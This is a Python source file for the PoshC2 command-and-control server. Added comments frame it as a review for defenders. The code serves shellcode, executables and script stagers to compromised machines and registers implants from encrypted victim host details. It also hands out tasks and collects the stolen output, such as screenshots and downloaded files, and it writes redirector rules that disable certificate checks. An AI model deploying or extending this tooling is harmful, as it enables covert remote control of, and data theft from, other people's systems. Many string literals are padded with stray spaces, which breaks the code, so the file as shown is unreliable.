#!/usr/bin/env python
import argparse , os , sys , re , datetime , time , base64 , BaseHTTPServer , re , logging , ssl , signal
from Implant import *
from Tasks import *
from Core import *
from Colours import *
from Help import *
from DB import *
from Payloads import *
from Config import *
from Cert import *
from Help import *
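class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """HTTP request handler for the C2 listener.

    GET requests hand out a queued task, serve a file from
    PayloadsDirectory, or register a new implant; unmatched GET requests
    get a 404 page. POST requests carry task output back from an implant
    that is already in the database.

    Review notes for defenders and maintainers:
      * Request headers and POST bodies are passed to logging.info() in
        full, so the session cookie and returned output reach whatever
        log handler is configured.
      * The Server banner is replaced with the configured ServerHeader
        value and the Python version suffix is overwritten.
      * Values taken from the request (User-Agent, decrypted cookie
        fields, Content-Length) are used without validation; see the
        notes at each use.
    """

    # Runs once, while the class body is executed: install a SIGINT
    # handler that exits the process. The first parameter shadows the
    # `signal` module inside the function only.
    def signal_handler(signal, frame):
        sys.exit(0)
    signal.signal(signal.SIGINT, signal_handler)

    def log_message(self, format, *args):
        """Append one access-log line to the webserver log under ROOTDIR.

        Overrides the base-class logging hook so each request is written
        to a file together with the client's User-Agent header.

        Args:
            format: %-style format string supplied by the base class.
            *args: Values interpolated into ``format``.
        """
        try:
            useragent = str(self.headers[' user-agent '])
        except Exception as e:
            # Header lookup failed: log a placeholder instead.
            useragent = " None "
        # The User-Agent is client-controlled and is written unescaped;
        # treat this log as untrusted text when viewing or parsing it.
        # The context manager closes the handle even if the write fails;
        # the original left the file object for the garbage collector.
        with open(" %s webserver.log " % ROOTDIR, " a ") as log_file:
            log_file.write(" %s - [ %s ] %s %s \n " %
                           (self.address_string(), self.log_date_time_string(), format % args, useragent))

    def do_HEAD(s):
        """Answer a HEAD request with 200 and a text/html content type."""
        # Replace the default Server banner components.
        s.server_version = ServerHeader
        s.sys_version = " "
        s.send_response(200)
        s.send_header(" Content-type ", " text/html ")
        s.end_headers()

    def do_GET(s):
        """Dispatch a GET request.

        Order of checks: a pending task for the path, then the payload
        download paths derived from the QuickCommand setting, then implant
        registration (new-implant URL plus a SessionID cookie), and
        finally a 404 page.
        """
        # Full headers (including Cookie) go to the logging module.
        logging.info(" GET request, \n Path: %s \n Headers: \n %s \n ", str(s.path), str(s.headers))
        new_implant_url = get_newimplanturl()
        s.cookieHeader = s.headers.get(' Cookie ')
        QuickCommandURI = select_item(" QuickCommand ", " C2Server ")
        s.server_version = ServerHeader
        s.sys_version = " "

        # Give the cookie a string value so the startswith() test below
        # cannot fail on None. (The original also assigned an unused
        # local in the other branch; that has been dropped.)
        if not s.cookieHeader:
            s.cookieHeader = " NONE "

        # class Tasks()

        # An implant polling its URI receives the next queued task.
        new_task = newTask(s.path)

        if new_task:
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(new_task)

        # Payload download paths. Each branch reads one file from
        # PayloadsDirectory and returns it.
        # NOTE(review): these are substring tests evaluated in order, so a
        # path that satisfies an earlier branch never reaches a later one;
        # confirm the `_ex` test cannot shadow the `_ex6` test.
        # NOTE(review): a missing payload file raises from open() before
        # any response is sent.
        elif (" %s _bs " % QuickCommandURI) in s.path:
            filename = " %s payload.bat " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s _rg " % QuickCommandURI) in s.path:
            filename = " %s rg_sct.xml " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s potal " % QuickCommandURI) in s.path:
            filename = " %s Sharp-shellcode_x86.bin " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            # Binary file is returned base64-encoded under text/html.
            content = base64.b64encode(content)
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s login " % QuickCommandURI) in s.path:
            filename = " %s Sharp-shellcode_x64.bin " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            # Binary file is returned base64-encoded under text/html.
            content = base64.b64encode(content)
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s _cs " % QuickCommandURI) in s.path:
            filename = " %s cs_sct.xml " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s _py " % QuickCommandURI) in s.path:
            filename = " %s aes.py " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            # File bytes are returned as hex text behind a one-letter prefix.
            content = " a " + " ".join(" {:02x} ".format(ord(c)) for c in content)
            s.send_response(200)
            s.send_header(" Content-type ", " text/plain ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s _ex " % QuickCommandURI) in s.path:
            filename = " %s Posh32.exe " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            s.send_response(200)
            s.send_header(" Content-type ", " application/x-msdownload ")
            s.end_headers()
            s.wfile.write(content)

        elif (" %s _ex6 " % QuickCommandURI) in s.path:
            filename = " %s Posh64.exe " % (PayloadsDirectory)
            with open(filename, ' rb ') as f:
                content = f.read()
            s.send_response(200)
            s.send_header(" Content-type ", " application/x-msdownload ")
            s.end_headers()
            s.wfile.write(content)

        # class Implant()

        # Registration: the request path contains the new-implant URL and
        # the Cookie header starts with the SessionID name. The cookie
        # value is decrypted with KEY and split into six ';'-separated
        # host fields.
        elif new_implant_url in s.path and s.cookieHeader.startswith(" SessionID "):
            # The exact query suffix selects the implant type; the checks
            # are independent, so the last match wins.
            implant_type = " Normal "
            if s.path == (" %s ?p " % new_implant_url):
                implant_type = " Proxy "
            if s.path == (" %s ?d " % new_implant_url):
                implant_type = " Daisy "
            if s.path == (" %s ?m " % new_implant_url):
                implant_type = " OSX "
            if s.path == (" %s ?c " % new_implant_url):
                implant_type = " C# "
            if s.path == (" %s ?p?c " % new_implant_url):
                implant_type = " C# "

            # NOTE(review): the C# and OSX branches are not wrapped in
            # try/except, unlike the default branch below. A cookie that
            # does not split into exactly six fields raises here and no
            # response is written by this method.
            if implant_type == " C# ":
                cookieVal = (s.cookieHeader).replace(" SessionID= ", " ")
                decCookie = decrypt(KEY, cookieVal)
                IPAddress = " %s : %s " % (s.client_address[0], s.client_address[1])
                Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(" ; ")
                user = User.decode(" utf-8 ")
                # Keep only the part after the first backslash (drops a
                # domain prefix from the user field).
                if " \\ " in user:
                    user = user[user.index(" \\ ") + 1:]
                newImplant = Implant(IPAddress, implant_type, Domain.decode(" utf-8 "), user, Hostname.decode(" utf-8 "), Arch, PID, Proxy)
                newImplant.save()
                newImplant.display()
                responseVal = encrypt(KEY, newImplant.SharpCore)
                s.send_response(200)
                s.send_header(" Content-type ", " text/html ")
                s.end_headers()
                s.wfile.write(responseVal)

            elif implant_type == " OSX ":
                cookieVal = (s.cookieHeader).replace(" SessionID= ", " ")
                decCookie = decrypt(KEY, cookieVal)
                IPAddress = " %s : %s " % (s.client_address[0], s.client_address[1])
                # Field order differs from the other branches: User first.
                User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(" ; ")
                newImplant = Implant(IPAddress, implant_type, Domain.decode(" utf-8 "), User.decode(" utf-8 "), Hostname.decode(" utf-8 "), Arch, PID, Proxy)
                newImplant.save()
                newImplant.display()
                responseVal = encrypt(KEY, newImplant.PythonCore)
                s.send_response(200)
                s.send_header(" Content-type ", " text/html ")
                s.end_headers()
                s.wfile.write(responseVal)

            else:
                try:
                    cookieVal = (s.cookieHeader).replace(" SessionID= ", " ")
                    decCookie = decrypt(KEY, cookieVal)
                    Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(" ; ")
                    IPAddress = " %s : %s " % (s.client_address[0], s.client_address[1])
                    user = User.decode(" utf-8 ")
                    if " \\ " in user:
                        user = user[user.index(' \\ ') + 1:]
                    newImplant = Implant(IPAddress, implant_type, Domain.decode(" utf-8 "), user, Hostname.decode(" utf-8 "), Arch, PID, Proxy)
                    newImplant.save()
                    newImplant.display()
                    newImplant.autoruns()
                    responseVal = encrypt(KEY, newImplant.C2Core)

                    s.send_response(200)
                    s.send_header(" Content-type ", " text/html ")
                    s.end_headers()
                    s.wfile.write(responseVal)

                except Exception as e:
                    # Any failure (decrypt, split, save, ...) is reported
                    # on the console and answered with the 404 page.
                    # NOTE(review): if the failure happens after the 200
                    # status line was sent, a second status line follows.
                    print(" Decryption error: %s " % e)
                    s.send_response(404)
                    s.send_header(" Content-type ", " text/html ")
                    s.end_headers()
                    s.wfile.write(HTTPResponse)
        else:
            # Nothing matched: 404 with the page stored in the database,
            # falling back to the configured HTTPResponse.
            s.send_response(404)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            HTTPResponsePage = select_item(" HTTPResponse ", " C2Server ")
            if HTTPResponsePage:
                s.wfile.write(HTTPResponsePage)
            else:
                s.wfile.write(HTTPResponse)

    def do_POST(s):
        """Receive task output from a registered implant.

        The implant is identified by its RandomURI appearing in the
        request path; the cookie value decrypts to the task id and the
        body, from byte offset 1500 onward, decrypts to the task output.
        Every request is answered with 200 and default_response() from
        the ``finally`` clause, whatever happened before.
        """
        try:
            s.server_version = ServerHeader
            s.sys_version = " "
            # NOTE(review): Content-Length is taken from the client as-is
            # and that many bytes are read into memory; there is no cap.
            content_length = int(s.headers[' Content-Length '])
            s.cookieHeader = s.headers.get(' Cookie ')
            cookieVal = (s.cookieHeader).replace(" SessionID= ", " ")
            post_data = s.rfile.read(content_length)
            # Headers and the raw body go to the logging module.
            logging.info(" POST request, \n Path: %s \n Headers: \n %s \n \n Body: \n %s \n ", str(s.path), str(s.headers), post_data)
            now = datetime.datetime.now()
            # Every POST scans all implant rows looking for a URI match.
            result = get_implants_all()
            for i in result:
                implantID = i[0]
                RandomURI = i[1]
                Hostname = i[3]
                encKey = i[5]
                Domain = i[11]
                User = i[2]
                if RandomURI in s.path and cookieVal:
                    update_implant_lastseen(now.strftime(" % m/ %d / % Y % H: % M: % S "), RandomURI)
                    # Per-implant key (not the registration KEY).
                    decCookie = decrypt(encKey, cookieVal)
                    if decCookie.startswith(" Error "):
                        print(Colours.RED)
                        print(" The multicmd errored: ")
                        print(decrypt_bytes_gzip(encKey, post_data[1500:]))
                        print(Colours.GREEN)
                        # The original wrote a 200 response here and then
                        # returned, after which the ``finally`` clause
                        # wrote a second full response on the same
                        # connection. Returning alone yields exactly one.
                        return
                    taskId = str(int(decCookie.strip(' \x00 ')))
                    # Left-pad the id to five characters for display.
                    taskIdStr = " 0 " * (5 - len(str(taskId))) + str(taskId)
                    executedCmd = get_cmd_from_task_id(taskId)
                    task_owner = get_task_owner(taskId)
                    print(Colours.GREEN)
                    if task_owner is not None:
                        print(" Task %s ( %s ) returned against implant %s on host %s \\ %s @ %s ( %s ) " % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime(" % m/ %d / % Y % H: % M: % S ")))
                    else:
                        print(" Task %s returned against implant %s on host %s \\ %s @ %s ( %s ) " % (taskIdStr, implantID, Domain, User, Hostname, now.strftime(" % m/ %d / % Y % H: % M: % S ")))
                    #print decCookie,Colours.END
                    # The first 1500 bytes of the body are skipped; the
                    # remainder is decrypted and decompressed.
                    rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
                    # Drop spans enclosed by the 123456 ... 654321 markers.
                    outputParsed = re.sub(r' 123456(.+?)654321 ', ' ', rawoutput)
                    outputParsed = outputParsed.rstrip()

                    # What gets stored depends on the command that was
                    # issued for this task id.
                    if " loadmodule " in executedCmd:
                        print(" Module loaded sucessfully ")
                        update_task(taskId, " Module loaded sucessfully ")
                    elif " get-screenshot " in executedCmd.lower() or " screencapture " in executedCmd.lower():
                        try:
                            decoded = base64.b64decode(outputParsed)
                            # NOTE(review): i[3] is the stored host name,
                            # which presumably originates from the implant
                            # at registration; it is placed in a file path
                            # without sanitising separators - confirm.
                            filename = i[3] + " - " + now.strftime(" % m %d % Y % H % M % S_ " + randomuri())
                            # Context manager closes the file even if
                            # update_task() or the write raises.
                            with open(' %s %s .png ' % (DownloadsDirectory, filename), ' wb ') as output_file:
                                print(" Screenshot captured: %s %s .png " % (DownloadsDirectory, filename))
                                update_task(taskId, " Screenshot captured: %s %s .png " % (DownloadsDirectory, filename))
                                output_file.write(decoded)
                        except Exception as e:
                            update_task(taskId, " Screenshot not captured, the screen could be locked or this user does not have access to the screen! ")
                            print(" Screenshot not captured, the screen could be locked or this user does not have access to the screen! ")
                    # What should this be now?
                    # NOTE(review): both operands of this `or` are the
                    # same test; the second was presumably meant to be a
                    # different prefix.
                    elif (executedCmd.lower().startswith(" $shellcode64 ")) or (executedCmd.lower().startswith(" $shellcode64 ")):
                        update_task(taskId, " Upload shellcode complete ")
                        print(" Upload shellcode complete ")
                    elif (executedCmd.lower().startswith(" run-exe core.program core inject-shellcode ")):
                        update_task(taskId, " Upload shellcode complete ")
                        print(outputParsed)
                    elif " download-file " in executedCmd.lower():
                        try:
                            rawoutput = decrypt_bytes_gzip(encKey, (post_data[1500:]))
                            # Derive a local file name from the command
                            # text: strip the command keywords, dot-dot
                            # sequences and quote characters, then keep
                            # only what follows the last slash and the
                            # last backslash.
                            filename = executedCmd.lower().replace(" download-file ", " ")
                            filename = filename.replace(" -source ", " ")
                            filename = filename.replace(" .. ", " ")
                            filename = filename.replace(" ' ", " ")
                            filename = filename.replace(' " ', " ")
                            filename = filename.rsplit(' / ', 1)[-1]
                            filename = filename.rsplit(' \\ ', 1)[-1]
                            filename = filename.rstrip(' \x00 ')
                            original_filename = filename
                            if rawoutput.startswith(" Error "):
                                print(" Error downloading file: ")
                                # print() form, consistent with the rest
                                # of the file; output is unchanged.
                                print(rawoutput)
                            else:
                                # Output layout: 5 characters of chunk
                                # number, 5 of total chunks, then data.
                                chunkNumber = rawoutput[:5]
                                totalChunks = rawoutput[5:10]
                                # First chunk and the name is taken: pick
                                # the first free "<name>-<n>" variant.
                                if (chunkNumber == " 00001 ") and os.path.isfile(' %s /downloads/ %s ' % (ROOTDIR, filename)):
                                    counter = 1
                                    while(os.path.isfile(' %s /downloads/ %s ' % (ROOTDIR, filename))):
                                        if ' . ' in filename:
                                            filename = original_filename[:original_filename.rfind(' . ')] + ' - ' + str(counter) + original_filename[original_filename.rfind(' . '):]
                                        else:
                                            filename = original_filename + ' - ' + str(counter)
                                        counter += 1
                                # Later chunk: find the file the earlier
                                # chunks went to.
                                if (chunkNumber != " 00001 "):
                                    counter = 1
                                    if not os.path.isfile(' %s /downloads/ %s ' % (ROOTDIR, filename)):
                                        print(" Error trying to download part of a file to a file that does not exist: %s " % filename)
                                    while(os.path.isfile(' %s /downloads/ %s ' % (ROOTDIR, filename))):
                                        # First find the 'next' file would be downloaded to
                                        if ' . ' in filename:
                                            filename = original_filename[:original_filename.rfind(' . ')] + ' - ' + str(counter) + original_filename[original_filename.rfind(' . '):]
                                        else:
                                            filename = original_filename + ' - ' + str(counter)
                                        counter += 1
                                    if counter != 2:
                                        # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
                                        # NOTE(review): the name is built
                                        # from `counter`, not an earlier
                                        # index as the comment above
                                        # describes - verify which file
                                        # later chunks should append to.
                                        if ' . ' in filename:
                                            filename = original_filename[:original_filename.rfind(' . ')] + ' - ' + str(counter) + original_filename[original_filename.rfind(' . '):]
                                        else:
                                            filename = original_filename + ' - ' + str(counter)
                                    else:
                                        filename = original_filename
                                print(" Download file part %s of %s to: %s " % (chunkNumber, totalChunks, filename))
                                update_task(taskId, " Download file part %s of %s to: %s " % (chunkNumber, totalChunks, filename))
                                # Context manager closes the file even if
                                # the write raises.
                                with open(' %s /downloads/ %s ' % (ROOTDIR, filename), ' a ') as output_file:
                                    output_file.write(rawoutput[10:])
                        except Exception as e:
                            update_task(taskId, " Error downloading file %s " % e)
                            print(" Error downloading file %s " % e)

                    else:
                        # Any other command: store and print the output.
                        update_task(taskId, outputParsed)
                        print(Colours.GREEN)
                        print(outputParsed + Colours.END)
        except Exception as e:
            # NOTE(review): every error in the handler is discarded here
            # (missing headers, decrypt failures, database errors), which
            # also hides malformed or hostile requests from the operator.
            e = " "
            # print e
            # traceback.print_exc()

        finally:
            # Always answer 200 with the default response body.
            s.send_response(200)
            s.send_header(" Content-type ", " text/html ")
            s.end_headers()
            s.wfile.write(default_response())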
# Entry point: create or load the project, (re)generate payloads, wrap
# the listening socket in TLS and serve requests until interrupted.
if __name__ == ' __main__ ':
    server_class = BaseHTTPServer.HTTPServer
    # Bind the listener to the configured host and port.
    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
    # Clear the terminal using the platform's command.
    try:
        if os.name == ' nt ':
            os.system(' cls ')
        else:
            os.system(' clear ')
    except Exception as e:
        print(" cls ")
    print(chr(27) + " [2J ")
    print(Colours.GREEN + logopic)
    print(Colours.END + " ")

    # KeyFile = None, CertFile = None, ClientCertCAs = None

    if os.path.isfile(Database):
        # Existing project: reuse the stored server settings.
        print(" Using existing database / project " + Colours.GREEN)
        C2 = get_c2server_all()
        if (C2[1] == HostnameIP):
            # Stored host matches the configured one: show the saved
            # quickstart text if it exists.
            qstart = " %s quickstart.txt " % (ROOTDIR)
            if os.path.exists(qstart):
                with open(qstart, ' rb ') as f:
                    print(f.read())
        else:
            # Configured host differs from the stored one: keep the
            # current payloads as payloads_old (deleting any earlier
            # payloads_old) and build a fresh set for the new host.
            print(" Error different IP so regenerating payloads ")
            if os.path.exists(" %s payloads_old " % ROOTDIR):
                import shutil
                shutil.rmtree(" %s payloads_old " % ROOTDIR)
            os.rename(" %s payloads " % ROOTDIR, " %s payloads_old " % ROOTDIR)
            os.makedirs(" %s payloads " % ROOTDIR)
            C2 = get_c2server_all()
            newPayload = Payloads(C2[5], C2[2], HostnameIP, C2[3], C2[8], C2[12],
                                  C2[13], C2[11], " ", " ", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
            new_urldetails(" updated_host ", HostnameIP, C2[3], " ", " ", " ", " ")
            # Persist the new host and QuickCommand values.
            update_item(" HostnameIP ", " C2Server ", HostnameIP)
            update_item(" QuickCommand ", " C2Server ", QuickCommand)
            newPayload.CreateRaw()
            newPayload.CreateDlls()
            newPayload.CreateShellcode()
            newPayload.CreateSCT()
            newPayload.CreateHTA()
            newPayload.CreateCS()
            newPayload.CreateMacro()
            newPayload.CreateEXE()
            newPayload.CreateMsbuild()
            newPayload.CreatePython()
            newPayload.WriteQuickstart(ROOTDIR + ' quickstart.txt ')

    else:
        # New project: create the folder layout and the database.
        print(" Initializing new project folder and database " + Colours.GREEN)
        print(" ")
        directory = os.path.dirname(ROOTDIR)
        if not os.path.exists(directory):
            os.makedirs(directory)
            os.makedirs(" %s /downloads " % directory)
            os.makedirs(" %s /reports " % directory)
            os.makedirs(" %s /payloads " % directory)
        initializedb()
        # Refuse to start with an unparseable default sleep value.
        if not validate_sleep_time(DefaultSleep):
            print(Colours.RED)
            print(" Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h ")
            print(Colours.GREEN)
            sys.exit(1)
        # Store the configuration together with a freshly generated key.
        setupserver(HostnameIP, gen_key(), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, ROOTDIR, ServerPort, QuickCommand, DownloadURI, " ", " ", " ", Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referer, APIToken, APIUser, EnableNotifications)
        rewriteFile = " %s /rewrite-rules.txt " % directory
        print " Creating Rewrite Rules in: " + rewriteFile
        print " "
        # Header for the generated proxy rewrite-rules file.
        # Defender note: these directives switch off the proxy's checks of
        # the upstream certificate (SSLProxyVerify none, and the peer CN,
        # name and expiry checks off), so a redirector using this file
        # accepts any certificate presented at the configured address.
        rewriteHeader = [" RewriteEngine On ", " SSLProxyEngine On ", " SSLProxyCheckPeerCN Off ", " SSLProxyVerify none ", " SSLProxyCheckPeerName off ", " SSLProxyCheckPeerExpire off ", " # Change IPs to point at C2 infrastructure below ", " Define PoshC2 10.0.0.1 ", " Define SharpSocks 10.0.0.1 "]
        rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
        with open(rewriteFile, ' w ') as outFile:
            for line in rewriteFileContents:
                outFile.write(line)
                outFile.write(' \n ')
            # Redundant: the with-statement closes the file on exit.
            outFile.close()

        C2 = get_c2server_all()
        newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
                              C2[13], C2[11], " ", " ", C2[19], C2[20],
                              C2[21], get_newimplanturl(), PayloadsDirectory)

        new_urldetails(" default ", C2[1], C2[3], " ", " ", " ", " ")
        newPayload.CreateRaw()
        newPayload.CreateDlls()
        newPayload.CreateShellcode()
        newPayload.CreateSCT()
        newPayload.CreateHTA()
        newPayload.CreateCS()
        newPayload.CreateMacro()
        newPayload.CreateEXE()
        newPayload.CreateMsbuild()

        # The listener's certificate is self-signed and generated here.
        create_self_signed_cert(ROOTDIR)
        newPayload.CreatePython()
        newPayload.WriteQuickstart(directory + ' /quickstart.txt ')

    print(" ")
    print(" CONNECT URL: " + select_item(" HostnameIP ", " C2Server ") + get_newimplanturl() + Colours.GREEN)
    print(" WEBSERVER Log: %s webserver.log " % ROOTDIR)
    # Module-level key that MyHandler.do_GET uses to decrypt the
    # registration cookie and encrypt the reply.
    KEY = get_baseenckey()
    print(" ")
    print(time.asctime() + " PoshC2 Server Started - %s : %s " % (HOST_NAME, PORT_NUMBER))
    print(Colours.END)

    # TLS is mandatory: without both certificate files the server stops.
    if (os.path.isfile(" %s posh.crt " % ROOTDIR)) and (os.path.isfile(" %s posh.key " % ROOTDIR)):
        try:
            # NOTE(review): ssl.wrap_socket() is deprecated in later
            # Python versions in favour of SSLContext.wrap_socket().
            httpd.socket = ssl.wrap_socket(httpd.socket, keyfile=" %s posh.key " % ROOTDIR, certfile=" %s posh.crt " % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
        except Exception as e:
            # NOTE(review): any failure above, not only a missing
            # PROTOCOL_TLS constant, silently retries with the protocol
            # pinned to TLS 1.0 and the original error is discarded.
            httpd.socket = ssl.wrap_socket(httpd.socket, keyfile=" %s posh.key " % ROOTDIR, certfile=" %s posh.crt " % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
    else:
        raise ValueError(" Cannot find the certificate files ")

    #logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL

    # Serve until Ctrl-C, then release the socket.
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print(time.asctime() + " PoshC2 Server Stopped - %s : %s " % (HOST_NAME, PORT_NUMBER))